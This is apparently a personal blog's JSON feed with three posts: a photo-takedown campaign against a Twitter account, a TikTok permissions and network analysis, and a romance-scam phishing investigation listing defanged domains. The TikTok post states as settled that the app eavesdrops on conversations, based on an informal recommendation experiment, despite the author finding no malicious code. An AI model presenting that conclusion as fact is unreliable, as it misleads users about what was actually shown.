feed.json
{
"version": "https://jsonfeed.org/version/1",
"title": "Sync_Pundit's Blog👽😎🔱🔥",
"description": "",
"home_page_url": "https://blog.syncpundit.io",
"feed_url": "https://blog.syncpundit.io/feed.json",
"user_comment": "",
"author": {
"name": "Sync_Pundit"
},
"items": [
{
"id": "https://blog.syncpundit.io/mission-bianca-coster-vindication/",
"url": "https://blog.syncpundit.io/mission-bianca-coster-vindication/",
"title": "Mission: Bianca Coster Vindication",
"summary": "Bianca Coster, a Digital Creator, is known to most of us as the face of ChrisExcel. I first encountered ChrisExcel sometime during the…",
"content_html": "<p><span style=\"font-weight: 400;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\">Bianca Coster</a>, a Digital Creator, is known to most of us as the face of ChrisExcel. I first encountered ChrisExcel sometime during the height of COVID. Seeing his profile picture, I honestly thought that it was a stock photo... until this morning. </span></p>\n<p><span style=\"font-weight: 400;\">A friend talked about a podcast episode from <span style=\"color: #3598db;\"><a href=\"https://piped.syncpundit.io/watch?v=9r3pvW5K79w\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Penuel The Black Pen</a></span> where <span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Bianca Coster</a></span> was interviewed and talked about how ChrisExcel has ruined her life by using her photo as his brand. I looked into her and it seems she has asked ChrisExcel to stop using her photo, but he retains it to this day. 
</span></p>\n<p><span style=\"font-weight: 400;\">I have since made it my mission to get <span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Bianca Coster</a></span>’s photos off of ChrisExcel’s account for three reasons:</span></p>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">To get some vindication for <span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Bianca Coster</a></span></span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">To test if Twitter has a bias when dealing with high-value individuals breaking their ToS</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">To refine my process for Twitter Takedowns</span></li>\n</ol>\n<p><span style=\"font-weight: 400;\">The only social media account I know for sure belongs to her is<span style=\"color: #3598db;\"> </span></span><span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/channel/\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">@bianca_coster</span></a></span><span style=\"font-weight: 400;\">. But there’s a Twitter account that seems somewhat plausibly hers, </span><span style=\"color: #3598db;\"><a href=\"https://twitter.com/Bianca_Coster\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">@Bianca_Coster</span></a></span><span style=\"font-weight: 400;\">. Given her following on Instagram and her brand being more built for Instagram, the Twitter account seems somewhat plausible. For the purpose of testing reasons 2 & 3, I’ll be assuming the account is hers. 
</span></p>\n<p><span style=\"font-weight: 400;\">Since I’ll be going after a Twitter account that has a HUGE following and an active user base, and is often in the Trending column, we have to collect as much evidence as humanly possible to prove that <span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Bianca Coster</a></span> is the rightful owner of those images and that they are not being used with her permission, in good faith, nor within fair use. I found a good bunch of accounts in all sorts of places - all of which look and feel plausibly hers. I also got a bunch of product endorsements, modelling portfolios, etc. That should be enough evidence to get started.</span></p>\n<p><span style=\"font-weight: 400;\">Now comes the hard part... Approaching Twitter and convincing them to go ahead with a takedown.</span></p>\n<p><span style=\"color: #000000;\">Let's see how it goes, it's all in Twitter's hands now.</span></p>",
"image": "https://blog.syncpundit.io/media/posts/10/Screenshot-from-2023-04-25-20-59-36.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Research"
],
"date_published": "2023-04-25T21:01:13+02:00",
"date_modified": "2023-04-25T21:09:37+02:00"
},
{
"id": "https://blog.syncpundit.io/are-we-safe-from-tiktok/",
"url": "https://blog.syncpundit.io/are-we-safe-from-tiktok/",
"title": "Are we safe from TikTok?",
"summary": "We all know that one doomsday guy who always goes on and on about how \"Social media companies are spying on us and…",
"content_html": "<p>We all know that one doomsday guy who always goes on and on about how \"Social media companies are spying on us and collecting our private data - we should avoid social media like the plague\"</p>\n<p><img loading=\"lazy\" src=\"https://media.tenor.com/NcX_5PkRrhMAAAAC/self-burn-rare.gif\" data-is-external-image=\"true\"></p>\n<p>Well... I am that guy 😅. I was talking to a friend about reducing screen time. My biggest offenders are YouTube and mobile games, hers was TikTok. She shared some funny TikToks and I noticed that each time she did, they all came with a tracking ID tied to her account and a message to join her on TikTok. Now this isn't strange behaviour at all in this new world of ours, but there was something peculiar about how they were going about it. It somehow felt imposing... I couldn't explain it, but I had a strong urge to download the app as well as a sense of dread at the same time. </p>\n<p>I remembered all the bad press TikTok had been getting these past two years and decided to take a look into it myself before I downloaded the app.</p>\n<h2>The History of TikTok</h2>\n<p>Remember the good old days of Vine? Back in the early 2010s Vine was just about the closest thing to TikTok. Right around that time a Chinese startup now called ByteDance was formed. Unlike any ordinary startup, the weird thing about ByteDance was how many Chinese government officials were employed there, a mystery which would later be revealed. </p>\n<p>ByteDance's first goal was to create a news app. Instead of the usual news format of reporters and editors creating the news and publishing it, ByteDance was working on a state-of-the-art algorithm to serve as the backbone of their news app.</p>\n<p>Their news app, Headlines, was a genius invention. The algorithm chose and curated the news for each individual user, leaving no need for editors and reporters but, perhaps most importantly, serving users exactly what they wanted to consume. The app was a hit! 
It gained 10 million users in just 3 months.</p>\n<p>The success of Headlines was followed up a few years later by another app, Douyin, the direct ancestor of TikTok. Within just a year it had gained around 100 million users, with over a billion videos viewed per day! With this, the stage was set: ByteDance was ready to go international. </p>\n<p>They named the international version of Douyin \"TikTok\" and launched it. Soon enough people caught wind of it and it was fairly successful. But as it got more successful there was another competitor in the space, Musical.ly. Musical.ly was an app that allowed its users to create 15-second to 1-minute lip-syncing music videos and choose sound tracks to accompany them, use different speed options (time-lapse, fast, normal, slow motion, and epic) and add pre-set filters and effects.</p>\n<p>ByteDance saw the potential of Musical.ly and acquired it for a whopping US$900 million. ByteDance consolidated the user accounts of Musical.ly and TikTok, merging the two apps into one under the name TikTok. Former Musical.ly users could still produce videos between 15 seconds and one minute, but could now access a larger number of filters and effects, as well as smoother editing and publishing systems and higher-quality code. And thus TikTok as we know it was born.</p>\n<h2>Investigation</h2>\n<p>Fast forward to today, whenever you're reading this: a lot of governments have banned TikTok either completely or at least for government officials and their families. I'm very skeptical by nature so this alone isn't enough of a deterrent, but when both former US president D.J. Trump and current president J. Biden agreed that TikTok was a credible threat, that caught my attention! Those guys seem to go out of their way to disagree on everything 😂.</p>\n<p>Given the amount of negative press TikTok has been getting, I figured they would have gone to extreme lengths to obfuscate any nefarious code in their app. 
With that in mind I went to a third-party app store and looked for the oldest version of TikTok - thanks to <span style=\"color: #3598db;\"><a href=\"https://web.archive.org/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">The Wayback Machine</a></span> I was able to get my hands on v10.xxx upwards. </p>\n<h4>Heavy Chinese Ties</h4>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-16-58-15.png\" alt=\"chinese ip addresses\" width=\"1220\" height=\"962\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-2xl.png 1600w\"></figure>\n<p>The first thing I found analysing the app were all the IP addresses TikTok was calling to for sending and receiving data. I found:</p>\n<ul>\n<li>Total: <span style=\"color: #e67e23;\">81</span> IP addresses</li>\n<li>Live: <span style=\"color: #e67e23;\">32</span> IP addresses</li>\n<li>Dead: <span style=\"color: #e67e23;\">48</span> IP addresses</li>\n<li>Chinese owned: <span style=\"color: #e67e23;\">58</span> IP addresses </li>\n</ul>\n<p>No one is surprised that TikTok calls to Chinese IP addresses, but what was truly mind-blowing was just how many there are. 
<span style=\"color: #e67e23;\">58</span>/<span style=\"color: #e67e23;\">81</span> of the IP addresses were Chinese; this makes it <span style=\"color: #e67e23;\">71.6</span>% of all the IP addresses (of the ones I found anyway). Of those <span style=\"color: #e67e23;\">58</span>, <span style=\"color: #e67e23;\">48</span> belong to Alibaba and <span style=\"color: #e67e23;\">10</span> belong to ByteDance. What worries me about this is the fact that ByteDance basically works with the Chinese government; I wouldn't expect any different from Alibaba.</p>\n<h4>Invasive Tracking</h4>\n<p>After tediously going through hundreds of libraries and classes I finally stumbled upon something interesting. A library called AppsFlyer. Check this out:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-18-54-33.png\" alt=\"apps flyer\" width=\"427\" height=\"347\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-2xl.png 1600w\"></figure>\n<p>Wikipedia says: </p>\n<blockquote>\n<p><strong>AppsFlyer</strong> is a SaaS mobile marketing analytics and attribution platform </p>\n</blockquote>\n<p>So the library is basically for tracking, collecting and attributing data and analytics of the app's users. 
Check this out:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-19-28-10.png\" alt=\"collecting EMEI\" width=\"925\" height=\"305\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-2xl.png 1600w\"></figure>\n<p>They are collecting IMEIs. This is a unique identifier of each particular cell phone. You can think of it as your phone's fingerprint. 
</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-19-29-58.png\" alt=\"\" width=\"904\" height=\"72\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-2xl.png 1600w\"></figure>\n<p>Check this out as well:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-23-00-50.png\" alt=\"\" width=\"963\" height=\"587\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-2xl.png 1600w\"></figure>\n<p>They are also collecting location info.</p>\n<p>Just when I thought I had seen the worst of it, I saw something even scarier...</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" 
src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-05-21-06-55.png\" alt=\"\" width=\"941\" height=\"237\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-2xl.png 1600w\"></figure>\n<p>These are some permissions that are REQUIRED for the app to function, as in, MANDATORY! Let's go over them:</p>\n<ul>\n<li>Camera: Autofocus</li>\n<li>Location: Network, GPS</li>\n<li>Microphone</li>\n<li>Touch Screen</li>\n<li>Screen: Portrait</li>\n<li>Telephony</li>\n<li>Wifi </li>\n</ul>\n<p>Now some of these I can understand. The app couldn't work without the phone's touch screen, portrait mode and mayyyybe WiFi. But why would the camera and autofocus be mandatory right off the bat? I would understand it being an optional requirement when someone wants to create content; the same goes for the microphone. Unless one is recording a video from the app it really doesn't need to be constantly on. WHY do the camera and microphone HAVE TO BE <strong>required</strong> regardless of what you're using the app for?</p>\n<p>How about the location, network and GPS? Why on Goku's earth would TikTok deem it MANDATORY to know your location, network and GPS for you to use the app?</p>\n<p>What about Telephony? What even is that? 
<span style=\"color: #3598db;\"><a href=\"https://developer.android.com/reference/android/telephony/package-summary\" style=\"color: #3598db;\">Developer.android.com</a></span> says of telephony:</p>\n<blockquote>\n<p>Provides APIs for monitoring the basic phone information, such as the network type and connection state, plus utilities for manipulating phone number strings.</p>\n</blockquote>\n<p>Now, what APIs are provided by telephony?</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-05-22-12-19.png\" alt=\"\" width=\"934\" height=\"752\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-2xl.png 1600w\"></figure>\n<p>Yuuuup! 
An app for watching and maybe creating videos made it MANDATORY to use a package that gives them access to APIs that basically can:</p>\n<ul>\n<li>know your cell location</li>\n<li>know your cell info</li>\n<li>know your mobile data activity</li>\n<li>know the precise state of your data connection </li>\n<li>get notified when your network carrier and/or its configuration changes</li>\n<li>know the cause for your disconnected calls</li>\n<li>get indicators of call forwarding</li>\n<li>know the state of your phone calls</li>\n<li>know your network carrier </li>\n<li>know the status of your data activation</li>\n<li>know the state of your data connection</li>\n</ul>\n<p>I haven't found any evidence of malicious behaviour in TikTok's code, but it goes without saying that their parent company, ByteDance, has employees from the Chinese government - most of their IP addresses call to Chinese data centres and all Chinese companies are required by law to provide whatever data the government wants. All this on top of the fact that they are COLLECTING all manner of private information from ALL its users.</p>\n<h2>The Experiment</h2>\n<p>So after all these findings I decided to download the app myself and test whether they are actually using the data they are harvesting. For the experiment to work I needed to make sure I didn't contaminate my account whatsoever. I needed TikTok to use its own algorithm without my input. </p>\n<p>With that in mind I created a blank account with a random username, random birthday and no initial interests. I started watching videos on the For You page and made sure not to open any TikToks sent to me on the app so TikTok wouldn't attribute my account to anyone else's. To test if they were listening to my conversations I started binge-watching specific YouTube videos on speaker whenever TikTok was running in the background. 
I spent a whole Saturday watching <span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/@ConnorPrice_\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Connor Price</a></span> and <span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/@Thatsdax\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Dax</a></span> videos. Sunday morning on my For You page I got this:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/photo_2023-03-02_19-55-46.jpg\" alt=\"\" width=\"278\" height=\"600\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-xs.jpg 300w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-sm.jpg 480w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-md.jpg 768w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-lg.jpg 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-xl.jpg 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-2xl.jpg 1600w\"></figure>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/photo_2023-03-02_19-56-37.jpg\" alt=\"\" width=\"277\" height=\"600\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-xs.jpg 300w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-sm.jpg 480w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-md.jpg 768w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-lg.jpg 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-xl.jpg 1360w 
,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-2xl.jpg 1600w\"></figure>\n<p>Now, if this is not evidence enough I don't know what is. </p>\n<h2>Conclusion</h2>\n<p>Clearly TikTok is harvesting all manner of private information about us from our phones: listening to our private conversations, tracking our cell location, tracking our GPS, tracking heuristics about our phone calls, etc.</p>\n<p>With the combination of IMEI, network carrier, cell location and GPS, TikTok basically knows exactly where you are even after you change your mobile carrier and network. On top of that, since you happily give them your name and date of birth and allow the app to go through your contacts to \"find your friends\", all this coupled with the fact that they already have access to your camera along with autofocus and are clearly listening to your conversations - this means that TikTok knows who you are. As in, YOU! THEY KNOW YOU! They know where you stay, where you work, who your friends are, what you talk about with everyone you talk to (EVERYTHING YOU TALK ABOUT with EVERYONE you talk to). </p>\n<p>The question is, why should we care about any of that? Especially since all this information seems to better our experience on the app.</p>\n<p>If you live in a country where the government protects your rights this seems like a valid question. But if, like myself, your native country has gone through its fair share of authoritarian regimes, you know the value of privacy and relative anonymity. When your government wants to control every aspect of your life, including what you can and cannot say, your home is a haven - there you can be free to criticise the government without fear of disappearing. But with apps like TikTok actively spying on its users, you're never free, ever.</p>\n<p>The problem with living in a free country is the assumption that it will always stay that way. That your leaders will forever remain benevolent. 
From personal experience I know that they can change in an instant, and when they do, you need to make sure you're not sharpening your enemy's tools for them. For me this means taking control of my privacy and security, and TikTok is a MASSIVE violation of both. I don't want the Chinese, or any government for that matter, to have access to my entire private life and location at all times. The same goes for any company or corporation.</p>\n<p>Right now it's the Chinese government doing the spying so it's easy to feel like you're safe. If we let China do this, what then stops other governments from doing the same? Africans know better than anyone else that during their fight against colonialism a lot of the countries were sponsored and helped by China. Today most of the industrial and infrastructure development is sponsored by China. Most consumer products are from China as well. I'm sure that the superpower that has helped your country since the late 20th century to this day definitely does not influence your government at all, right? African governments are famous for protecting the liberties of their citizens....</p>\n<p>My advice: Delete that app! If you <strong>really</strong> need to use it, stick to using the web version in your browser. </p>",
"image": "https://blog.syncpundit.io/media/posts/7/TikTok.jpg",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Threat Intelligence",
"Research"
],
"date_published": "2023-03-02T19:43:09+02:00",
"date_modified": "2023-03-06T20:57:26+02:00"
},
{
"id": "https://blog.syncpundit.io/romance-scam-network/",
"url": "https://blog.syncpundit.io/romance-scam-network/",
"title": "Romance Scam Network",
"summary": "Back in April someone reported to have lost over $20 000 USD to an elaborate phishing scam. The domain was found to be…",
"content_html": "<p><span style=\"font-weight: 400;\">Back in April someone reported to have lost over $20 000 USD to an elaborate phishing scam. The domain was found to be part of an elaborate network of romance scams. The Modus Operandi of the attack was an attractive woman, appearing to be of Asian descent whose profile was used by the scammers to reach out to high-value individuals (mostly men) on social media platforms like Instagram and Snapchat and dating apps like Tinder. The scammer would then build rapport and gain the victims’ trust by providing them with cryptocurrency trading strategies before driving the victim to a phishing website and swindling them of their fortunes by convincing the user to send money to the scammers’ wallet.</span></p>\n<p><span style=\"font-weight: 400;\">I followed this thread to discover a more complex and widely spread campaign leading to the discovery of additional victims.</span></p>\n<h2><span style=\"font-weight: 400;\">Discovery</span></h2>\n<p><span style=\"font-weight: 400;\">I initially received a report of a user scammed by a MetaTrader 5 broker impersonating LocalCryptos. 
LocalCryptos is a peer-to-peer crypto marketplace where people buy and sell crypto, while MetaTrader is a trading platform that offers financial markets, including Forex and stock exchanges, as well as futures markets.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7//MetaTrader.png\" alt=\"fake MT5 ticker\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-xs.png 300w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-sm.png 480w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-md.png 768w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-2xl.png 1600w\"></p>\n<p><span style=\"font-weight: 400;\">Unfortunately, the user had been scammed of $24 460 USD through the website.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7//email.png\" alt=\"email to fake support staff\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7//responsive/email-xs.png 300w ,https://blog.syncpundit.io/media/posts/7//responsive/email-sm.png 480w ,https://blog.syncpundit.io/media/posts/7//responsive/email-md.png 768w ,https://blog.syncpundit.io/media/posts/7//responsive/email-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7//responsive/email-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2xl.png 1600w\"></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7//email-2.jpg\" alt=\"fake success registration email \" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7//responsive/email-2-xs.jpg 300w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-sm.jpg 480w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-md.jpg 
768w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-lg.jpg 1024w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-xl.jpg 1360w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-2xl.jpg 1600w\"></p>\n<p><span style=\"font-weight: 400;\">Tragically, stories like these remain all too common. Sharing educational pieces such as this blog post which look deeper into the details of how these scams operate is part of how we can combat this as an industry. The following section will look further into the technical details of the attack.</span></p>\n<h2><span style=\"font-weight: 400;\">DNS Analysis</span></h2>\n<p><span style=\"font-weight: 400;\">Most of the phishing scams that we see targeting cryptocurrency exchange users are set up in the following way. The scammers purchase a domain and website hosting, set up a phishing kit that they’ve either developed or purchased and mass deliver the attack to the victims, either through social media channels or email. Their DNS setup is normally fairly simple. The phishing domain’s registrar also provides the name servers, at best the website is hidden behind proxies like Cloudflare.</span></p>\n<p><span style=\"font-weight: 400;\">This particular scam setup on the domain Lcryptos [.] 
com had an interesting DNS setup.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7//dns.png\" alt=\"lcryptos.com dns\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7//responsive/dns-xs.png 300w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-sm.png 480w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-md.png 768w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-2xl.png 1600w\"></p>\n<ul>\n<li><span style=\"font-weight: 400;\">They had set up mail exchange servers on chengmail[.]cn</span></li>\n<li><span style=\"font-weight: 400;\">They had set up SPF: TXT lcryptos[.]com v=spf1 include:spf.chengmail.cn ~all </span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">Lcryptos[.]com’s WHOIS records show that it was registered on 1 July 2021. It was hosted in Hong Kong along with a few other domains:</span></p>\n<ul>\n<li><span style=\"font-weight: 400;\">foxconnr[.]com (Likely targeting users of LooksRare)</span></li>\n<li><span style=\"font-weight: 400;\">financialfx[.]com</span></li>\n<li><span style=\"font-weight: 400;\">hkyodacapital[.]com</span></li>\n<li><span style=\"font-weight: 400;\">first-ratio[.]com</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">It had several subdomains:</span></p>\n<ul>\n<li><span style=\"font-weight: 400;\">broker[.]lcryptos[.]com</span></li>\n<li><span style=\"font-weight: 400;\">admin[.]lcryptos[.]com</span></li>\n<li><span style=\"font-weight: 400;\">user[.]lcryptos[.]com</span></li>\n<li><span style=\"font-weight: 400;\">trader[.]lcryptos[.]com</span></li>\n</ul>\n<h2><span style=\"font-weight: 400;\">Deeper Investigation: More Victims</span></h2>\n<p><span style=\"font-weight: 400;\">From gathering OSINT (Open Source Intelligence) I managed to find more victims of the scam and 
put together LCryptos’ MO.</span></p>\n<p><span style=\"font-weight: 400;\">The earliest victim I found was on 19 July 2021, the same month the domain was registered; they had been swindled out of at least $5 000USD. I went on to find more victims between July and September, all with a similar story. The scam seems to have stopped temporarily after September, only to resurface in December, presumably on a new hosting provider, judging from the default Windows Server snapshot of the website on The Wayback Machine. The phishing website was probably reported and had its hosting revoked.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/internet-archive.png\" alt=\"internet archive of lcryptos.com\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-2xl.png 1600w\"></p>\n<h2><span style=\"font-weight: 400;\">The Modus Operandi</span></h2>\n<p><span style=\"font-weight: 400;\">The scammers set up accounts on Instagram, Snapchat and Tinder as beautiful Asian women.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/instagram.png\" alt=\"fake instagram account\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/instagram-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/instagram-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/instagram-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/instagram-lg.png 1024w 
